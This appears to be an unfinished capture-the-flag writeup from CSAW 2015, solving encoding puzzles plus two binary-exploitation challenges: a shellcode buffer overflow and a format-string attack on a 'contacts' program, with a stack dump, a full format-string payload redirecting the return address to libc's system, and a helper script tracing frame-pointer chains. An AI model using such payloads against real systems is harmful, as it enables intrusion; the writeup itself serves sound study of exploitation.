@parksjin01
Last active April 7, 2017 11:08
CSAW 2015 writeup

zer0-day

  • You can get a hint from the last sentence (= is used as padding).
  • Split the string by \n and base64-decode each line.
  • flag: flag{We are fsociety, we are finally free, we are finally awake!}

ones and zer0s

  • Convert the binary to ASCII.
  • flag: flag{People always make the best exploits.}

precision

  • To solve this problem, we must not change the float value, and we have to change ret.
  • The stack looks like this: [USER_INPUT*0x80] + [float_value]*2 + [dummy]*0x8 + sfp + ret
  • I'll put shellcode in the USER_INPUT area, and I'll use the shellcode from here.
  • This program uses ASLR, so we would need to bypass it, but they give us the address of the buffer, so we can just use it.
  • The answer program is uploaded here.

contacts

  • We can find a format string bug (fsb) in printing contacts.
  • I'll suppose ASLR is turned off at first.

0xffffd590: 0x0804c420 0x0804c410 0xf7e61cab 0x00000000
0xffffd5a0: 0xf7fb4000 0xf7fb4000 0xffffd5d8 0x08048c99
0xffffd5b0: 0x0804b0a8 0x00000028 0x0804c410 0x0804c420
0xffffd5c0: 0xf7fb4d60 0x08048ed6 0x0804b0a0 0x00000000
0xffffd5d0: 0xf7fb4000 0x00000000 0xffffd608 0x080487a2
0xffffd5e0: 0x0804b0a0 0xffffd5f8 0x00000050 0x00000000
0xffffd5f0: 0xf7fb43dc 0x08048288 0x00000004 0x0000000a
0xffffd600: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffd610: 0x00000001 0xffffd6a4 0xffffd6ac 0x00000000
0xffffd620: 0x00000000 0x00000000 0xf7fb4000 0xf7ffdc04

  • The slot at 0xffffd5a8 points to 0xffffd5d8, so it can be used to change 0xffffd5d8, and 0xffffd5d8 can then be used to change any address.
  • 0xffffd60c is the return address of the main loop.
  • I changed it to the address of the system function in libc (I used ret2libc because the NX bit is enabled on the stack and heap).
  • payload: 'print "1\n"+"aaaa\n"+"1111\n"+"400\n"+"%54796c"+"%6$hn"+"\n"+"1\n"+"aaaa\n2222\n400\n"+"%52640c"+"%18$n"+"\n"+"1\n"+"aaaa\n3333\n400\n"+"%54798c"+"%6$hn"+"\n"+"aaaa\n4444\n400\n"+"%63459c"+"%18$n"+"\n"+"1\n"+"aaaa\n5555\n400\n"+"%54804c"+"%6$hn"+"\n"+"aaaa\n6666\n400\n"+"%55339c"+"%18$n"+"\n"+"1\n"+"aaaa\n7777\n400\n"+"%54806c"+"%6$hn"+"\n"+"aaaa\n8888\n400\n"+"%63477c"+"%18$n"+"\n"+"1\n"+"aaaa\n9999\n400\n"+"%54792c"+"%6$hn"+"\n"+"4\n"+"5\n"'
  • But we still have to bypass ASLR, so we have to leak memory and calculate the proper address.
  • The program to pwn is here. It's dirty code yet, but I'll clean it up soon.
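The two-level write path above (0xffffd5a8 -> 0xffffd5d8 -> anywhere) comes straight from the stack dump: the slots whose values point back into the stack are saved frame pointers, and they form a chain. The following Python is an added example, not part of the original gist; it parses the dump quoted above (copied into the script as a constant) and lists those pointer slots and the chain starting at 0xffffd5a8.

```python
# Copy of the gdb-style stack dump quoted in the writeup (32-bit words).
STACK_DUMP = """\
0xffffd590: 0x0804c420 0x0804c410 0xf7e61cab 0x00000000
0xffffd5a0: 0xf7fb4000 0xf7fb4000 0xffffd5d8 0x08048c99
0xffffd5b0: 0x0804b0a8 0x00000028 0x0804c410 0x0804c420
0xffffd5c0: 0xf7fb4d60 0x08048ed6 0x0804b0a0 0x00000000
0xffffd5d0: 0xf7fb4000 0x00000000 0xffffd608 0x080487a2
0xffffd5e0: 0x0804b0a0 0xffffd5f8 0x00000050 0x00000000
0xffffd5f0: 0xf7fb43dc 0x08048288 0x00000004 0x0000000a
0xffffd600: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffd610: 0x00000001 0xffffd6a4 0xffffd6ac 0x00000000
0xffffd620: 0x00000000 0x00000000 0xf7fb4000 0xf7ffdc04
"""

WORD = 4  # 32-bit target, one word per column


def parse_dump(text):
    """Return {address: value} for every word in a gdb 'x/Nwx' style dump."""
    words = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        base_str, rest = line.split(":", 1)
        base = int(base_str, 16)
        for i, tok in enumerate(rest.split()):
            words[base + i * WORD] = int(tok, 16)
    return words


def stack_pointers(words):
    """Slots whose value is itself an address inside the dump.

    In a frame-pointer build these are almost always saved ebp values,
    so each one lets a write through it land on another stack slot.
    """
    return {addr: val for addr, val in words.items() if val in words}


def pointer_chain(words, start):
    """Follow saved-frame-pointer links from `start` while they stay in the dump."""
    chain, seen = [start], {start}
    while words.get(chain[-1]) in words and words[chain[-1]] not in seen:
        chain.append(words[chain[-1]])
        seen.add(chain[-1])
    return chain


if __name__ == "__main__":
    w = parse_dump(STACK_DUMP)
    for a, v in sorted(stack_pointers(w).items()):
        print(f"{a:#010x} -> {v:#010x}")
    print("chain:", [f"{a:#010x}" for a in pointer_chain(w, 0xFFFFD5A8)])
```

Running it shows three such slots (0xffffd5a8, 0xffffd5d8, 0xffffd5e4) and the chain 0xffffd5a8 -> 0xffffd5d8 -> 0xffffd608, which is the ebp chain the writeup relies on.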

Not yet finished
